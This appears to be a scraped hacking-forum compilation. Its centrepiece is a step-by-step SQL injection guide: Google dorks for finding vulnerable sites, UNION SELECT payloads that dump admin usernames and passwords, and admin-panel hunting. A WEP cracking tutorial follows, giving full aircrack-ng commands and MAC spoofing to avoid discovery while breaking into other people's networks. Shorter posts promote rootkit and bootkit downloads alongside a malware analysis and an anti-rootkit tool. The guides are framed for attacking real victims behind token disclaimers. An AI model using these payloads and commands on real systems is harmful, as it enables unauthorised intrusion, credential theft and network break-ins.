Hacking website using SQL Injection -step by step guid

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database .

Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=

 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
 

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat( columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:

http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html

Note:
This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing is CRIME

Maltego 3.1 Open source intelligence mining and visualization tool

Maltego – Open source intelligence mining and visualization tool

Although we do not make it a habit to announce third party releases, in Maltego’s case, we happily make an exception. Maltego 3.1 is the new flagship product from the guys at Paterva and offers a range of fantastic new features and enhancements to the already phenomenal product. If you haven’t tried Maltego, you don’t know what you are missing. Some of the new features include:

Completely new graph organisational abilities:

You now have the ability to organise the graph in terms of alignment as well as setting the layout for specific segments of graph as well as the entire graph:

New views, including Bubble View which allows users to sort information on their graph in terms of relevance by either incoming links (how many different bits of information point into a node), outgoing links (how many different links point out from a node) or both, as seen below:

Additionally with the layouts there is also the new Interactive Organic view which improves the speed of graph rendering dramatically by only redrawing relevant parts of the graph that are updated. There is also the ability to lock entities in place in a graph to allow for a more human structured format. Within the entities of the graph you can also merge entities together, add notes, add attachments (either from the web or local) as well as the previous features of adding custom entity types and changing the link properties:

Lastly the investigate tab also offers users the ability to now select all entities on a graph based on their bookmark, the type of entity it is as well as the previous searching capabilities:

Once the Parerva development team get their rest, we should be seeing a Maltego 3.1 CE edition surface…we will keep y’all updated once it does. Head down to the Paterva website now, and see the awesomeness of Maltego!

Albertino KeyLogger Tutorial

Beginners Guide To Hacking Wireless Networks

Beginners Guide To Hacking Wireless Networks

Hacking WEP wifi passwords Basic Entry into a WEP Encrypted Network


This Tutorial explains EVERYTHING in detail So, it is quite long. Enjoy.


1. Getting the right tools
This Tutorial is in Bt3 But Download The Latest Release Bt4.


Download Backtrack 4. It can be found here:


http://www.backtrack-linux.org/downloads/


 I downloaded the Dvd iso and burned it to a Dvd. Insert your BT4 Dvd/usb drive and reboot your computer into BT4. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.


2. Preparing the slave network for attack


Once in BT4, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:


airmon-ng


You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
Now type:


airmon-ng stop ath0


then type:


ifconfig wifi0 down


then:


macchanger --mac 00:11:22:33:44:55 wifi0


then:


airmon-ng start wifi0


What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on...
Now it's time to discover some networks to break into.


Type:


airodump-ng ath0


Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:


hold down ctrl and type c


This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.


**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type:
-c (channel)
then dont actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example you would type:
-c 6
Can't be much clearer than that...lets continue...


Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.

Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:


airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.


**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.


Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.


Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.


3. Actually cracking the WEP password


Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:


aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0




This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:


aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0




This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.


Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:


aircrack-ng -b (bssid) (filename)-01.cap


Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.




If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.


Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!


It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.


I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)


I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.


There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
Hacking WEP wifi passwords
By kumalynx
......................................................................................................................................................................................................

NET Framework Rootkits

he whitepaper .NET Framework rootkits - backdoors inside your framework.pdf covers various ways to develop rootkits for the .NET framework, so that every EXE/DLL that runs on a modified Framework will behave differently than what it's supposed to do. Code reviews will not detect backdoors installed inside the Framework since the payload is not in the code itself, but rather it is inside the Framework implementation. Writing Framework rootkits will enable the attacker to install a reverse shell inside the framework, to steal valuable information, to fixate encryption keys, disable security checks and to perform other nasty things as described in this paper.

This paper also introduces .NET-Sploit 1.0 - a new tool for building MSIL rootkits that will enable the user to inject preloaded/custom payload to the Framework core DLL.

Download and more info

Vbootkit 2.0

Vbootkit 2.0 is now open-source

Two security researchers open-source code that can be used to take control of versions of the Microsoft Windows 7 x64 operating system. The team decided to release the code despite initial reservations over security.

Vbootkit 2.0 Attacking Windows 7 (x64) via Boot Sectors presentation

Download Vbootkit 2.0 source code 

Swimming into Trojan and Rootkit GameThief.Win32.Magania Hostile Code

rojan-GameThief.Win32.Magania, according to Kaspersky naming convention, monitors the user activities trying to obtain valuable information from the affected user, especially about gaming login accounts. This long tutorial analyze this malware but is also a general document which explains how to analyze a modern nested-dolls malware. 

In this paper we will analyse more deeply the structure of this malware, especially the polymorphic part that represents a typical sample of hostile code. Starting from the first load into IDA we can see that Megania's PE structure and Import Table destroyed, this is how looks from WinGraph:

Download PDF

2009 Protecting OSs from RootKits

Countering Kernel Rootkits with Lightweight Hook Protection

Kernel rootkits have posed serious security threats due to their stealthy manner. To hide their presence and activities, many rootkits hijack control flows by modifying control data or hooks in the kernel space. A critical step towards eliminating rootkits is to protect such hooks from being hijacked. However, it remains a challenge because there exist a large number of widely-scattered kernel hooks and many of them could be dynamically allocated from kernel heap and co-located together with other kernel data. In addition, there is a lack of flexible commodity hardware support, leading to the socalled protection granularity gap kernel hook protection requires byte-level granularity but commodity hardware only provides pagelevel protection.

Source: Schneier on Security

Download PDF

Stoned Bootkit

 The Stoned Bootkit is a rootkit that is booted before the main operating system has, and is able to stay and hide itself in memory during execution of the guest operating system. The payload is executed beside the running operating system and comes with the bootkit. Stoned is designed to be operating system independent, it is multiplatform. It currently supports all 32-bit and 64-bit Windows systems and Linux.

It allows a very wide abstraction of the program and the running base, this means it is a new deployment platform of software. The current proof of concept payloads are a local privilege escalation and a remote surveillance tool. The platform, however is open for third-party future development.

The bootkit itself has an integrated module and plugin structure which allows extending its core features without touching the core code. New in this version is that it is totally independent from media, it can be started from hard disk (master boot record), but also CD/DVD/BD or even over the network.

Download PDF

Tuluka kernel inspector v1.0.394.77

Tuluka is a new powerful AntiRootkit, which has the following features:




Detects hidden processes, drivers and devices
Detects IRP hooks
Identifies the substitution of certain fields in DRIVER_OBJECT structure
Checks driver signatures
Detects and restores SSDT hooks
Detects suspicious descriptors in GDT
IDT hook detection
SYSENTER hook detection
Displays list of system threads and allows you to suspend them
IAT and Inline hook detection
and much more ...

Download: http://www.tuluka.org

More Info: http://www.rootkit.commuch more...